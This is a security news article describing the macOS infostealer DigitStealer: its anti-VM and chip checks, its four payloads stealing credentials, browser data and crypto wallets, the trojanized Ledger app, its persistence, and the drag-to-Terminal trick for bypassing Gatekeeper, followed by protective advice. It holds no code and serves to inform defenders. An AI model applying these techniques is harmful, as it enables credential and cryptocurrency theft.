New MacOS Malware ‘DigitStealer’ Targets Apple M2/M3 Chips
▼ Summary
– DigitStealer is a sophisticated macOS infostealer that disguises itself as legitimate apps like DynamicLake or Google Drive for desktop.
– It performs system checks to avoid running on virtual machines, Intel-based Macs, M1 chips, or specific geographic regions, targeting only newer Apple Silicon M2 or later devices.
– The malware delivers four payloads: one steals passwords and resets security settings, another exfiltrates browser data and cryptocurrency wallets, a third hijacks Ledger crypto applications, and the fourth ensures persistence with a backdoor.
– It tricks users into bypassing Gatekeeper by having them drag the file into Terminal from a spoofed website, rather than using the standard installation method.
– Users are advised to verify download sources, scan files with VirusTotal, avoid dragging apps to Terminal, and check app signatures to protect against such threats.
A newly identified and highly sophisticated malware strain, dubbed DigitStealer, is actively targeting macOS systems, specifically those running on the latest Apple M2 and M3 chips. This advanced infostealer cleverly disguises itself as the legitimate DynamicLake UI enhancement tool and potentially mimics Google’s Drive for desktop application, tricking users into installing malicious software.
The attack begins with a multi-stage delivery process. Before execution, a bash script runs entirely in memory, performing several critical checks. It first verifies the system’s country setting and will terminate if the machine appears to be located in certain geographic regions. The script also determines whether the system is a virtual machine and checks for specific hardware features to confirm it is running on an Apple Silicon M2 chip or a newer model. Interestingly, the malware avoids Intel-based Macs and, whether by design or error, even bypasses systems with the M1 chip, focusing its attack exclusively on devices with the newer ARM features found in M2 and later processors.
Once the environment is deemed suitable, the script retrieves and executes four distinct payloads. The first is a simple AppleScript infostealer that prompts the user to enter their password. If provided, it immediately begins exfiltrating credentials and small user files such as documents and notes. It also resets the macOS TCC database, which stores records of which applications are permitted to access sensitive data or system features.
The second payload collects, compresses, and sends data from a variety of popular web browsers. It targets the Keychain database, VPN configuration files, the Telegram tdata folder, which can be exploited to hijack Telegram accounts, and cryptocurrency wallet files from platforms including Ledger, Electrum, Exodus, and Coinomi.
A third payload specifically attacks the Ledger Wallet or Ledger Live cryptocurrency application by replacing its app.asar file with a trojanized version. This malicious file forces the application to connect to a server controlled by the attacker, effectively hijacking the wallet and allowing the interception or manipulation of the victim’s cryptocurrency data.
Finally, the fourth payload installs a Launch Agent on the target system to ensure persistence. Each time it runs, it dynamically fetches additional payloads from the attacker’s server. Initially, this final component is a backdoor, a JavaScript for Automation (JXA) script with full AppleScript capabilities, but the attacker retains the ability to change these payloads at any time.
The initial infection vector involves an unsigned disk image file named DynamicLake.dmg. Researchers have identified several disk images associated with this campaign. The malicious file is distributed through a fraudulent website, https[:]//dynamiclake[.]org, which closely imitates the legitimate DynamicLake utility site. Unsuspecting users who visit this spoofed site are instructed to drag the file into the Mac’s Terminal application, a technique that bypasses macOS’s built-in Gatekeeper security feature.
Attribution for this specific malware variant remains unclear. However, the methods used indicate a deep understanding of the macOS operating system and a persistent focus on evading detection. Malicious actors continue to exploit legitimate services and distribution techniques to circumvent macOS security controls and increase their success rates.
In recent months, attackers have created convincing replicas of GitHub repositories for popular Mac applications, again using the “drag-to-Terminal” trick to deceive users into running harmful scripts. The standard procedure for installing a Mac application is to drag it into the Applications folder, making this method particularly deceptive. More recently, a Reddit user reported encountering both the fake DynamicLake application and a counterfeit version of an app called AirPosture, though it is uncertain if these lead to a DigitStealer infection.
To protect against such threats, users should exercise extreme caution when searching for and installing new software. Always double-check that you are on the correct website or official GitHub repository. Before running any installer, use a service like VirusTotal to scan the downloaded file. Never drag an application into the Terminal window, as this is not a standard installation step. You can also use specialized applications to verify an app’s or installer’s digital signature. Staying informed through reliable security news sources can help you avoid falling victim to emerging threats.
(Source: HelpNet Security)
